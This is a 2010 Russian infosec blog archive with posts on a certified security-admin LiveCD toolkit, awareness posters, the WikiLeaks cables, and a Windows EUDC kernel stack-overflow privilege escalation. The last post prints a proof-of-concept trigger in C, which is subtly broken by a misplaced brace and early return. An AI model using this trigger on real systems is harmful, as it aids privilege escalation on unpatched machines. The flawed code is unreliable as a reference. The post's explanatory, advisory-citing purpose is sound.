Архив за Ноябрь, 2010

Концептуальный подход к построению мобильного места администратора безопасности

1 Отзыв

В современном мире IT-инфраструктура проникла практически в каждую организацию, и все они сталкиваются с набором как внешних, так и внутренних угроз в области информационной безопасности. В зависимости от размеров этой организации, характера её деятельности и других факторов – в том или ином виде определяются цели и задачи по обеспечению конфиденциальности, целостности и доступности обрабатываемой информации, соответственно, формируется политика информационной безопасности.

Но этот документ останется ничего не значащей бумагой, если нет людей, ответственных за контроль её внедрения и обеспечения. Среди них одну из важных ролей занимает администратор информационной безопасности (не путать с администратором системы).

1. Администратор информационной безопасности (защиты). Задачи и направления деятельности. Инструменты системного администратора

В соответствии с определением, приведенном в руководящем документе Гостехкомиссии России «Защита от несанкционированного доступа к информации: Термины и определения», администратор защиты – это субъект доступа, ответственный за защиту автоматизированной системы (АС) от несанкционированного доступа (НСД) к информации.

Как обеспечить эту защиту? Если речь идёт о технической защите информации, то здесь мы сталкиваемся с целым комплексом различных программных и программно-аппаратных средств защиты информации.

Помимо таких широко известных и распространенных средств как межсетевые экраны (МЭ), антивирусы, средства доверенной загрузки и создания доверенной среды, а также системы обнаружения вторжений (СОВ) – однако требуются и средства другого рода, обеспечивающие проверку работы всех вышеперечисленных продуктов. В специальных нормативных документах такие средства трактуются как средства тестирования и контроля эффективности защиты информации или средства анализа защищенности.

Иначе говоря, необходимы средства, которые администратор информационной безопасности сможет использовать для тестирования защищенности, как сети, так и отдельных автоматизированных рабочих мест (АРМов).

Рассмотрим типовой набор методик, относящихся к анализу защищенности АС. Администратору безопасности необходимо:

  • получать оперативную информацию о составе и структуре сети, открытых сервисах;
  • проводить тестирование на предмет наличия известных уязвимостей (penetration testing);
  • осуществлять контроль стойкости используемых паролей;
  • контролировать целостность критически важной информации;
  • контролировать и при необходимости изучать сетевой трафик между выбранными узлами сети;
  • тестировать систему гарантированной очистки информации;
  • проводить системный аудит ЭВМ из состава АС (аппаратная, программная конфигурация, журнал).

2. Требования к месту администратора информационной безопасности.

Перечислим основные требования к среде и месту работы администратора информационной безопасности системы:

1)    Защита от НСД к информации, обрабатываемой администратором безопасности на рабочем месте (пароли, ключи, результатов аудита АС и др.)

Данное требование может быть обеспеченно доверенной средой, в которой работает администратор и применением одним из двух механизмов к защите данной информации – либо гарантированная очистка данных по завершению работы, либо их шифрование при  хранении.

2)    Мобильность (переносимость) места администратора безопасности (возможность подключиться к произвольному сегменту сети и выполнить локальную проверку каждого АРМ или перекрестную проверку межсегментного соединения).

3)    Полнота инструментария – важно, когда все необходимые для работы средства доступны «из коробки», а операция по их развертыванию (deployment) требует минимум времени и усилий со стороны администратора.

4)    Сертификация – для работы в средах, обрабатывающих информацию с ограниченным доступом администратору безопасности необходимо использовать сертифицированные средства защиты и контроля эффективности защиты информации.

3. Пример реализации мобильного места администратора безопасности

В настоящее время отсутствует совокупность различных сертифицированных средств мониторинга, инвентаризации, контроля целостности, сканирования уязвимостей, контроля стойкости систем аутентифиакации, обеспечивающая построение мобильного места администратора безопасности, за исключением доверенной загружаемой среды администратора безопасности — «Сканер-ВС» (разработка и изготовление компании ЗАО «НПО «Эшелон»).

Комплекс «Сканер-ВС» представляет собой носитель, в зависимости от поставки или загрузочный компакт-диск (LiveCD), или USB-флэш (LiveFlash), который запускает свою собственную среду для работы, операционную систему (производная от Linux), данный подход позволяет нам выполнить первые два требования, поскольку данный носитель может быть установлен фактически в любой x86-совместимый компьютер, не нарушая целостности его программной среды, а вся обрабатываемая администратором информация хранится лишь в оперативной памяти, что гарантирует её очистку по завершению работы (по желанию администратора отчеты и другие данные могут быть сохранены на внешний носитель).

Данный продукт выполняет требование №4, поскольку имеет сертификаты соответствия Минобороны России  и ФСТЭК России. 

В соответствии с пунктом 3 рассмотрим функционал «Сканера-ВС», помимо других продуктов в него входит:

1)    Сетевой сканер.

Средство инвентаризации, контроля состояния и зондирования сети. (обеспечивает различные режимы работы, в т.ч. и скрытные для МЭ, позволяет сохранять и сравнивать «снимки» локальной вычислительной сети (ЛВС) за разные периоды времени).

2)    Сканер безопасности, средство поиска уязвимостей в ресурсах сети.

Многофункциональное средство выявления используемого ПО на узлах сети, тестирования проникновением и  выявления до 17 000 различных уязвимостей).

«Сканер-ВС» имеет в своём составе механизмы обновления через сеть  Интернет в том числе и базы уязвимостей для сканера безопасности.

3)    Аудитор паролей.

Средство анализа и перебора локальных и сетевых паролей.

Позволяет провести инвентаризацию и перебор пароль для локальных и сетевых записей для операционных систем семейства Windows и Linux (в т.ч. и для защищенных операционных систем, как: МСВС, Linux XP и Astra Linux).

Обеспечивает различные виды bruteforce и словарного перебора.

4)    Контроль целостности файлов, папок, секторов на диске и др. объектов.

Средство позволяет снимать и сверять контрольные суммы, как файлов и папок, так и секторов на диске, используя все популярные алгоритмы хэширования и генерацией соответствующей отчетности.

5)    Анализатор трафика, средство перехвата (снифинга) сетевого трафика и контроля передаваемой информации.

Средство позволяет перехватывать трафик между произвольными машинами коммутируемой сети (при необходимости используется технология ARP-спуфинга), в результате возможен анализ перехваченного трафика и выделения в нем важной информации (например: пароли для авторизации), возможен перехват и дешифрование трафика с подменой сертификатов.

6)    Общесистемный анализатор, средство снятия «снимка» программно-аппаратной конфигурации АРМ и журналов его событий (например, работа с USB).

7)    Средство проверки системы гарантированной очистки (позволяет осуществить посекторный поиск остаточной важной информации, не очищенной после сеанса работы ЭВМ, поиск возможен по паттернам из сформированного словаря, с учетом различных кодировок и форматов файлов).

Заключение

Проведенный анализ показал, что фактически все типовые, повторяющиеся операции и методики анализа защищенности сети могут быть произведены с переносного (фактически, виртуального) места администратора безопасности.

Данный подход имеет ряд достоинств  как с точки зрения использования ресурсов (не надо производить закупку новых ПК, менять топологию и адресацию сети), так и в плане безопасности (обеспечение защищенной от изменений доверенной среды, быстрый доступ ко всем инструментам, легкость подключения к средствам виртуализации) и др.

Изученное сертифицированное решение (средство анализа защищенности «Сканер-ВС») показало полное соответствие данным требованиям.

Источники

  1. Аттестация без проблем: об использовании сетевых сканеров безопасности при аттестации АС  / Марков А.С., Миронов С.В., Цирлов В.Л. // Information Security — 2005 — №3.
  2. Виртуальное место администратора безопасности информации в автоматизированных системах / Фадин А.А. и др. // М.: БИТ-2010 — МГТУ им.Н.Э.Баумана, 2010 г.
  3. Дорофеев А.В. Тестирование на проникновение: демонстрация одной уязвимости или объективная оценка защищенности?// Защита информации. Инсайд, 2010. — №6 (ноябрь-декабрь).

Possibly Related Posts:


Повышение осведомленности в области информационной безопасности: плакаты

5 комментариев

Все мы знаем, что информационная безопасность начинается с конкретного сотрудника. Для того, чтобы донести принципы информационной безопасности компании внедряют программы повышения осведомленности в области ИБ, одной из составляющих которой являются агитационные плакаты.

Вот и мы начинаем публикацию наших плакатов (лучше печатать на А3):

Possibly Related Posts:


WikiLeaks опубликовал переписки дипломатов

Ваш отзыв

Сайт WikiLeaks, специализирующийся на рассекречивании секретных документов, распространил через ведущие мировые СМИ 28 ноября, более 250 тысяч персональных писем дипломатов США.

Обнародованная персональная переписка и персональные данные включает информацию о внешнеполитической стратегии США в отношении многих стран, коррупции и характеристику мировых лидеров. Информация пока находится в свободном доступе на сайтах таких газет, как El PaisLe MondeDer SpiegelThe Guardian и The New York Times и др. Пресс-секретарь Белого дома Роберт Гиббс заявил, что информация WikiLeaks «ставит наших дипломатов, разведчиков и людей во всем мире, которые работают с США для поддержки дипломатии и прозрачности в работе правительств, в опасное положение». Его слова приводит Agence France-Presse.

Possibly Related Posts:


Новая уязвимость позволяет повысить привилегии в Win7/Vista в обход UAC

2 комментария

Интересная уязвимость для повышения локальных привилегий до уровня системы, появилась 24 ноября в виде статьи на ресурсе The Code Project. Буквально через несколько часов она была удалена с этого ресурса, но информация уже распространилась по сети и на мой взгляд удалять ее было бессмысленно. Повысить привилегии можно на системах начиная от XP и до Vista/Win7, причем серверные версии тоже находятся под ударом. А что еще более интересно уязвимость актуальна, как на х86 системах, так и на х64. Правда представленный PoC код удалось успешно запустить только на х86 системах.

Демонстрация:

New Windows Zero Day Exploit — Nov 2010

Всему виной недостаточный контроль параметров функции WinAPI RtlQueryRegistryValues():

NTSTATUS RtlQueryRegistryValues(
__in ULONG RelativeTo,
__in PCWSTR Path,
__inout PRTL_QUERY_REGISTRY_TABLE QueryTable,
__in_opt PVOID Context,
__in_opt PVOID Environment
);

Эта функция используется для получения сразу нескольких параметров реестра и на выходе заполняет структуру _RTL_QUERY_REGISTRY_TABLE с результатами.

typedef struct _RTL_QUERY_REGISTRY_TABLE {
PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine;
ULONG Flags;
PWSTR Name;
PVOID EntryContext;
ULONG DefaultType;
PVOID DefaultData;
ULONG DefaultLength;
} RTL_QUERY_REGISTRY_TABLE, *PRTL_QUERY_REGISTRY_TABLE;

В поле EntryContext, из этой структуры, определяется тип выходного буфера и вот тут существует интересный нюанс, буфер может быть интерпретирован как структура UNICODE_STRING или как буфер из ULONGзначений.

typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

По заполнению этого буфера определяется тип ключа реестра, к которому был сделан запрос. Все бы хорошо, но был найден ключ реестра HKCU\EUDC\[Language]\SystemDefaultEUDCFont, к которому можно обращаться только с правами пользователя и изменять его тип на REG_BINARY посредством вызова функцииWin32k.sys->NtGdiEnableEudc(). В процессе работы этой функции предполагается, что значение реестра REG_SZи буфер размещается в стеке, как структура UNICODE_STRING из которой первое значение ULONGинтерпретирует длину буфера, но если значение реестра представлено, как REG_BINARY, то возникает классическое переполнение в стеке.

С учетом всех этих нюансов был разработан PoC (by noobpwnftw), который формирует в реестре значение перезаписывающее адрес возврата на стеке и выполняет произвольный буфер с кодом в режиме ядра.

Подробное описание уязвимости лежит здесь

http://www.kb.cert.org/vuls/id/529673
http://secunia.com/advisories/42356

Альтернативный PoC от d_olex (оригинал):

#define EUDC_FONT_VAL "SystemDefaultEUDCFont"

int _tmain(int argc, _TCHAR* argv[])
{
HKEY hKey;
char szKeyName[MAX_PATH], Buff[0x600];

sprintf_s(szKeyName, MAX_PATH, "EUDC\\%d", GetACP());

// создание ключа реестра
LONG Code = RegCreateKey(HKEY_CURRENT_USER, szKeyName, &hKey);
if (Code != ERROR_SUCCESS)
{
printf("ERROR: RegCreateKey() fails with status %d\n", Code);
return -1;
}
return 0;
}

// удаление старого параметра
RegDeleteValue(hKey, EUDC_FONT_VAL);

// создание нового параметра «SystemDefaultEUDCFont» типа REG_BINARY
FillMemory(Buff, sizeof(Buff), ‘A’);
Code = RegSetValueEx(hKey, EUDC_FONT_VAL, 0, REG_BINARY, Buff, 0x600);

RegCloseKey(hKey);

if (Code != ERROR_SUCCESS)
{
printf(«ERROR: RegSetValueEx() fails with status %d\n», Code);
return -1;
}

// вызов уязвимой функции
EnableEUDC(TRUE);

http://habrahabr.ru/blogs/infosecurity/108903/

Possibly Related Posts:


Infosecurity Russia 2010: доклады специалистов ЗАО «НПО «Эшелон»

4 комментария
В ходе выставки Infosecurity Russia 2010 ведущие специалисты ЗАО «НПО «Эшелон» выступили с рядом интереснейших докладов на самые актуальные темы по информационной безопасности (после каждой презентации ссылка для скачивания материалов в pdf-формате):

Possibly Related Posts: